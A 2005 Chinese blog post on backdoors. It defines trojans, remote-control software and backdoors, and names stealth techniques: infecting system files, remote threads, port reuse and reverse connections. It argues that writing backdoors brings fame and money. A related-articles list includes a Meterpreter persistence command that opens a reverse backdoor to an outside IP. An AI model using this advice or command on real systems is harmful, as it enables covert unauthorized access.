谈谈后门

原创 2005年02月27日 21:29:00
作者:yyt_hac
主页:http://www.yythac.com
Email:webmaster@yythac.com

随着电脑技术的发展和网络的普及,黑客技术已经为越来越多的人所了解,好多网站也推出了黑客
培训班、VIP会员等一系列服务,这些服务必然会培养出好多黑客技术爱好者,而后门作为黑客必须的工具
必然会受到越来越多的关注。目前新后门增长的速度也很快,我接触后门很久了,也写过一些后门,现在想
谈谈对后门的一些看法,如果有错误的地方,欢迎指正。

我想谈的第一个问题就是对一些概念的理解,那就是“远程控制软件”,“木马”,“后门”。

一般“远程控制软件”是指用户便于远程管理而有意在自己机器上安装的软件,如pcanywhere,它
的特征是用户自己有意安装的软件,它的使用者是用户自己。不过现在有人也把“远程控制软件”的意义扩
充了,认为有远程控制功能的软件就叫远程控制软件,比如有些木马、后门有远程控制功能,也把它们叫远
程控制软件。

“木马”全名叫“特洛伊木马”,它的使用者是黑客,更确切的说是“骇客”,它主要是“骇客”
通过欺骗用户的方法(包含捆绑,利用网页等)让用户不知不觉的安装到他们系统中的一类软件,主要功能
有远程控制,盗密码等。木马的名字就指出了它的特征,那就是具有欺骗性,软件的分类不应该看它的功能
,而是应该看它的特征。现在有些木马的开发者不喜欢把自己开发的木马叫作“木马”,而是叫“远程控制
软件”。原因很简单,“木马”是贬义的,“远程控制软件”就是褒义的了,这样做也可以理解,因为毕竟
“木马”也包含在扩充了意义的“远程控制软件”中了。可是还有人说它开发的木马是远程控制软件而不是
木马,这就不能理解了。是不是木马不是由你说的,而是要看它的特征。“木马”和常规远程控制软件的区
别就在于它能够通过欺骗的方式让用户不知不觉的安装到他的计算机中,它不是用户自己想安装的,而常规
远程控制软件是用户自己有意安装的。你能说“冰河”不是木马吗?不能,因为它有木马的特征。木马的特
征也是好多人讨厌它的原因,因为被人欺骗了总是很痛苦的,特别是被人欺骗了感情;好多木马都有盗密码
功能,这是让人讨厌它的另一个原因,因此水平比较高的黑客都不屑于用木马。

“后门”是黑客在入侵了计算机以后为了以后能方便的进入该计算机而安装的一类软件,它的使用
者是水平比较高的黑客,他们入侵的机器都是一些性能比较好的服务器,而且这些计算机的管理员水平都比
较高,为了不让管理员发现,这就要求“后门”必须很隐蔽,因此后门的特征就是它的隐蔽性。木马的隐蔽
性也很重要,可是由于被安装了木马的机器的使用者一般水平都不高,因此相对来说就没有后门这么重要了。
后门和木马的区别就是它更注重隐蔽性但是没有欺骗性,因此它的危害性没有木马大,名声介于“远程控制
软件”和“木马”之间。

通过上面的分析,我们就很容易区分这三类软件了。后门作为一种黑客工具,它的主要用途还是在
非法方面,把它说成是一种恶意程序也可以接受,可是却不能把它说成是病毒、木马,因为它们出来本质特
征是不同的。当然,任何事物都有两面性,有好的作用就有坏的作用,工具本身的好坏是一个方面,但是关
键是要看使用工具的人,刀可以用来杀人也可以用来救人,不能因为刀可以杀人就把刀说得一无是处,关键
是看好处多些还是坏处多些。后门也一样,不可否认,它的坏处要多些,可是它的破坏力不大,而且它也有
好的一方面,比如后门让大家增加网络安全意识,提高国家整体网络安全水平,可以增加杀毒软件的卖点,
也可以用它来控制国外的机器为祖国做贡献,是不是很夸张?

下面我们谈谈什么样的后门才是好后门?也就是后门最重要的是什么?

现在好多后门技术都公开了,也都有源代码,因此写一个后门并不困难,只要学会了编程,两个星
期就可以写出一个还可以的后门,这也是新后门不断增加的原因,可是要写一个真正好后门并不是一件容易
的事情。那什么样的后门才是真正好的后门呢?其实从上面可以知道后门的特征就是它的隐蔽性,因此隐蔽
性好的后门才是真正的好后门。我发现好多人在说这个后门的功能有多么多么的强大,那个后门有多么多么
难卸载,讨论这些有意义吗?只有在隐蔽性很好的情况下再来考虑它的功能和易用性,否则被发现了,你的
后门功能再多,再容易使用,也一点作用都没有。如果你只想找功能强大,容易使用的后门,我劝你还是使
用商业化的远程控制软件好了,如把pcanywhere改成能在命令行下可以安装的版本就可以了,它的功能够强
大了吧,使用也够方便了吧,根本用不到后门。难卸载性就更没意义了,如果我发现了我的机器被装了后门
,你再难卸载我重装系统还不行吗?不可能你发现有根刺在你肉里而不把它拔出来的。如果你发现你的系统
被装了后门却因为难卸载而能忍受它在你的系统中,那我只能说 ‘I 服了 YOU’。

那么后门的隐蔽性主要体现在哪些方面呢?我觉得有下面三个方面:
启动方式、存在方式和连接方式。

启动方式是指当操作系统启动时怎样启动后门,目前决大多数后门都是采用加注册表启动项或者加
系统服务的方式,这些方式都是很容易发现的,而感染系统文件的启动方式是比较隐蔽的。

存在方式是指当后门成功启动后,它在操作系统中的存在形式,目前主要有三种方式:进程、隐藏
进程和远程线程,进程和隐藏进程现在都很容易发现了,远程线程是一种比较隐蔽的方式。

连接方式是指该后门的用户怎样通过客户端和安装了该后门的机器建立连接,从而控制该机器。开
tcp端口的方式太明显,fport就可以发现,udp端口也一样,使用icmp等数据包实现无连接传输不是很稳定,
目前端口复用技术和反向连接技术都是比较好的技术,各有所长,也可以两种技术相结合。

如果一个后门能够把上面三个方面都做得很好,那才是一个真正的好后门,否则只能算是一个入门
级后门。

那为什么要写后门呢?

首先,写一个好的后门是一件很有挑战性的事情,毕竟它涉及到很多高级的编程技术,编写后门能
够增加你对操作系统底层的了解,大幅度的提高编程水平。从事一些工作的人水平到了一定的阶段就想有所
突破,做一些有挑战性的事情,比如登山运动员想登上珠穆朗玛峰,游戏运动员想游过太平洋,黑客程序员
嘛就是想写一个好后门了。
其次,写后门可以提高你在黑客界的知名度。
再次,写收费后门还可以带来经济效益。
最后,后门虽然有很多坏处,但是毕竟破坏力不大,它也有些好的用途。

写这篇文章是因为在聊天的过程中经常有人和我讨论这些问题,也看到了好多人对这些问题的看法,
因此我也把我的一些观点写出来,以后有人和我讨论这些问题我就把这篇文章给他看就可以了。

这篇文章有可能会冒犯一些人,如果你觉得我冒犯了你,那有可能是你水平比较低,因为我尊重的
是水平高的黑客,而不是骇客。如果你自认为水平很高却还是觉得我冒犯了你,那欢迎批评指正。


2005-2-24

WEB容器内解决JSP后门的一种方式

JSP后门,本来是比较少的,但还是存在漏洞,被“有心之人”利用了,jsp后门主要从上传图片合并jsp后门,到服务器,后,执行jsp,包括所谓的菜刀,服务器中招之后,发现后门jsp,用nginx 方式禁...
  • chinajust
  • chinajust
  • 2016年06月02日 01:29
  • 1242

Python入门:python自制后门程序

应该场景:1、当目标服务器上有python环境(一般linux系统都会预安装) 2、目标服务器上不允许安装其它工具(因为要留后门或进一步攻击内容就需要上传各种工具)#python3.5 #Autho...
  • foryouslgme
  • foryouslgme
  • 2016年11月29日 22:02
  • 1109

捡了一个非常淫荡的PHP后门,给跪了

  • h4ck0ne
  • h4ck0ne
  • 2016年01月23日 17:49
  • 4640

某ssh后门试用

在获取linux的root权限之后,虽然可以ssh连进去,但是可否长期进行控制呢?这里就涉及到ssh后门的问题了。在这里,我大致试用了一下一个比较老但是稳定的ssh后门,算是作个记录。后续我会翻译一篇...
  • bnxf00000
  • bnxf00000
  • 2015年04月23日 10:11
  • 1815

Meterpreter 建立持久后门 backdoor

安装后门方法一: meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108 Persistent agent script is...
  • Three_fish
  • Three_fish
  • 2016年05月06日 17:56
  • 2192

[原]使用python建立后门

基本思路:     假设:待劫持文件为A.exe;构建后门脚本为backdoor.py;注入使用的DLL为inject.dll;     后门构建的一般思路为:重命名(或者移动)A.exe为xxx.e...
  • qq917141931
  • qq917141931
  • 2012年11月05日 17:43
  • 431

为linux留一个后门,做后备

在这里要为大家提供的是 prism,这个在github里面有,编译安装后,执行很简单,只需要执行一条命令,发送一条icmp,这样一条反弹shell就成了。有几点需要注意: 1. 密码是在文件里面修改...
  • vbaspdelphi
  • vbaspdelphi
  • 2016年11月17日 09:50
  • 1870

Linux系统安全之ssh后门

http://www.2cto.com/article/201309/242910.html 1.ssh -V #查看当前的ssh版本信息 #OpenSSH_5.3p1, OpenS...
  • lixiangyong123
  • lixiangyong123
  • 2017年03月16日 10:48
  • 462

shift后门制作和禁止

一、什么是shift后门? shift后门是黑客希望以后方便进入服务器而在没有密码的情况下为进入服务器系统而设置的一个后门。 其操作就是在不知道管理员密码的情况下,连续按5次shift键来启动粘滞...
  • ru_li
  • ru_li
  • 2015年06月02日 10:34
  • 2350

一款猥琐的PHP后门分析

Webshell代码如下: php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8...
  • lengyue1084
  • lengyue1084
  • 2016年09月21日 11:31
  • 1859
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:谈谈后门
举报原因:
原因补充:

(最多只允许输入30个字)